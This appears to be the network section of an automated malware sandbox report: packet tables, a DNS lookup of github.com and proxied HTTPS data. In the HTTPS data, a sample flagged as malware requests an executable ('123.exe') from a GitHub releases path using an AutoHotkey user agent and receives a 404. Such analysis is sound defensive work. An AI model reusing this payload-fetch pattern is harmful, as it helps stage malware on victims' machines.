Jul 5, 2024 03:36:13.528250933 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528265953 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528273106 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528284073 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528294086 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528312922 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528318882 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528337002 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528354883 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528359890 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528389931 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528397083 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528404951 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528429031 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528446913 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528834105 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528873920 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528882027 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528888941 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528904915 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528930902 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528934002 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.528969049 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.528975964 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529010057 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529078007 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529123068 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529129028 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529165030 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529165983 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529175997 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529200077 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529230118 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529306889 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529347897 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529350996 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529357910 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529385090 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529407024 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529413939 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529449940 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529455900 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529493093 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529838085 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529881001 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529886007 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529917955 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529920101 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529927969 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529966116 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.529969931 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.529975891 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530009985 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530033112 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530035019 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530042887 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530072927 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530087948 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530101061 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530107975 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530121088 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530131102 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530150890 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530158043 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530177116 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530200005 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530200005 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530210018 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530235052 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530260086 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.530750990 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.530796051 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.613858938 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.613903999 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.613924026 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.613939047 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.613962889 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.613991022 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.613993883 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614029884 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614330053 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614384890 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614387035 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614397049 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614430904 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614454985 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614459991 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614489079 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614499092 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614505053 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614533901 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614535093 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614557981 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614562988 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614573002 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614603043 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.614609003 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.614650965 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615010977 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615061998 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615062952 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615071058 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615112066 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615123987 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615127087 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615174055 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615191936 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615231037 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615236998 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615242958 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615267038 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615278006 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.615282059 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.615328074 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616049051 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616103888 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616163015 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616199017 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616203070 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616211891 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616255999 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616257906 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616266966 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616302967 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616302967 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616317034 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616343021 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616348028 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616352081 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616384983 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616394997 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616400957 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616429090 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616429090 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616462946 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616476059 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616487980 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616499901 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616513014 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616523027 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616548061 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616554976 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616594076 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616594076 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616622925 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616626024 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616628885 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616635084 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616666079 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616673946 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616677999 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616713047 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616718054 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616724968 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616755962 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616775990 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616779089 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616786957 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616815090 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616830111 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616836071 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616878986 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616883993 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616919994 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.616946936 CEST	443	49730	140.82.121.3	192.168.2.4
Jul 5, 2024 03:36:13.616988897 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.627118111 CEST	49730	443	192.168.2.4	140.82.121.3
Jul 5, 2024 03:36:13.627135992 CEST	443	49730	140.82.121.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 03:36:11.318640947 CEST	60719	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:36:11.326807976 CEST	53	60719	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2024 03:36:11.318640947 CEST	192.168.2.4	1.1.1.1	0x9cdc	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 5, 2024 03:36:11.326807976 CEST	1.1.1.1	192.168.2.4	0x9cdc	No error (0)	github.com		140.82.121.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	140.82.121.3	443	6916	C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.1111.23697.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-05 01:36:12 UTC	129	OUT	GET /abuzgreksi/456/releases/download/456/123.exe HTTP/1.1 User-Agent: AutoHotkey Host: github.com Cache-Control: no-cache
2024-07-05 01:36:13 UTC	473	IN	HTTP/1.1 404 Not Found Server: GitHub.com Date: Fri, 05 Jul 2024 01:36:13 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: origin-when-cross-origin, strict-origin-when-cross-origin
2024-07-05 01:36:13 UTC	3039	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f 6d 20 72 61 77 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 61 70 69 2e 67 69 74 68 75 62 2e Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.
2024-07-05 01:36:13 UTC	598	IN	Data Raw: 31 30 30 30 30 0d 0a 0a 0a 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 0a 20 20 6c 61 6e 67 3d 22 65 6e 22 0a 20 20 0a 20 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 6d 6f 64 65 3d 22 61 75 74 6f 22 20 64 61 74 61 2d 6c 69 67 68 74 2d 74 68 65 6d 65 3d 22 6c 69 67 68 74 22 20 64 61 74 61 2d 64 61 72 6b 2d 74 68 65 6d 65 3d 22 64 61 72 6b 22 0a 20 20 64 61 74 61 2d 61 31 31 79 2d 61 6e 69 6d 61 74 65 64 2d 69 6d 61 67 65 73 3d 22 73 79 73 74 65 6d 22 20 64 61 74 61 2d 61 31 31 79 2d 6c 69 6e 6b 2d 75 6e 64 65 72 6c 69 6e 65 73 3d 22 74 72 75 65 22 0a 20 20 3e 0a 0a 0a 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 64 6e 73 2d 70 72 Data Ascii: 10000<!DOCTYPE html><html lang="en" data-color-mode="auto" data-light-theme="light" data-dark-theme="dark" data-a11y-animated-images="system" data-a11y-link-underlines="true" > <head> <meta charset="utf-8"> <link rel="dns-pr
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 69 67 69 6e 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 22 3e 0a 0a 20 20 0a 0a 20 20 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 2d 65 66 64 32 66 32 32 35 37 63 39 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 Data Ascii: igin> <link rel="preconnect" href="https://avatars.githubusercontent.com"> <link crossorigin="anonymous" media="all" rel="stylesheet" href="https://github.githubassets.com/assets/light-efd2f2257c96.css" /><link crossorigin="anonymous" media="all"
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 6c 69 67 68 74 5f 74 72 69 74 61 6e 6f 70 69 61 2d 66 65 34 31 33 37 62 35 34 62 32 36 2e 63 73 73 22 20 2f 3e 3c 6c 69 6e 6b 20 64 61 74 61 2d 63 6f 6c 6f 72 2d 74 68 65 6d 65 3d 22 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 64 61 74 61 2d 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 64 61 72 6b 5f 74 72 69 74 61 6e 6f 70 69 61 2d 31 39 31 31 66 30 63 66 30 64 62 34 2e 63 73 73 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 63 Data Ascii: b.githubassets.com/assets/light_tritanopia-fe4137b54b26.css" /><link data-color-theme="dark_tritanopia" crossorigin="anonymous" media="all" rel="stylesheet" data-href="https://github.githubassets.com/assets/dark_tritanopia-1911f0cf0db4.css" /> <link c
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 73 5f 69 6e 5f 69 6e 70 75 74 73 22 2c 22 72 65 61 63 74 5f 73 74 61 72 74 5f 74 72 61 6e 73 69 74 69 6f 6e 5f 66 6f 72 5f 6e 61 76 69 67 61 74 69 6f 6e 73 22 2c 22 63 75 73 74 6f 6d 5f 69 6e 70 22 2c 22 72 65 6d 6f 76 65 5f 63 68 69 6c 64 5f 70 61 74 63 68 22 2c 22 6b 62 5f 73 6f 75 72 63 65 5f 72 65 70 6f 73 22 5d 7d 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 77 70 2d 72 75 6e 74 69 6d 65 2d 64 63 34 32 64 31 39 Data Ascii: s_in_inputs","react_start_transition_for_navigations","custom_inp","remove_child_patch","kb_source_repos"]}</script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/wp-runtime-dc42d19
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 73 65 6c 65 63 74 6f 72 2d 6f 62 73 65 72 76 65 72 5f 64 69 73 74 5f 69 6e 64 65 78 5f 65 73 6d 5f 6a 73 2d 39 66 39 36 30 64 39 62 32 31 37 63 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 Data Ascii: c="https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/ve
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 61 74 61 6c 79 73 74 5f 6c 69 62 5f 69 6e 64 65 78 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 2d 65 6c 65 6d 65 6e 74 5f 2d 37 38 32 63 61 35 2d 31 34 31 38 31 66 32 39 35 64 63 30 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 Data Ascii: fer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_clipboard-copy-element_-782ca5-14181f295dc0.js"></script><script crossorigin="anonymous" defer="de
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 62 72 61 69 6e 74 72 65 65 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 64 69 73 74 5f 62 72 6f 77 73 65 72 2d 64 65 74 65 63 74 69 6f 6e 5f 6a 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 73 74 61 63 6b 2d 36 38 38 33 35 64 2d 35 39 32 30 36 63 38 33 34 61 34 31 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 Data Ascii: s://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser-detection_js-node_modules_stack-68835d-59206c834a41.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://git
2024-07-05 01:36:13 UTC	1370	IN	Data Raw: 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 63 6f 6c 6f 72 2d 63 6f 6e 76 65 72 74 5f 69 6e 64 65 78 5f 6a 73 2d 63 64 64 31 65 38 32 62 33 37 39 35 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 67 69 74 68 75 62 61 73 73 65 74 73 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 Data Ascii: script" src="https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-cdd1e82b3795.js"></script><script crossorigin="anonymous" defer="defer" type="application/javascript" src="https://github.githubassets.com/assets/vendors-node
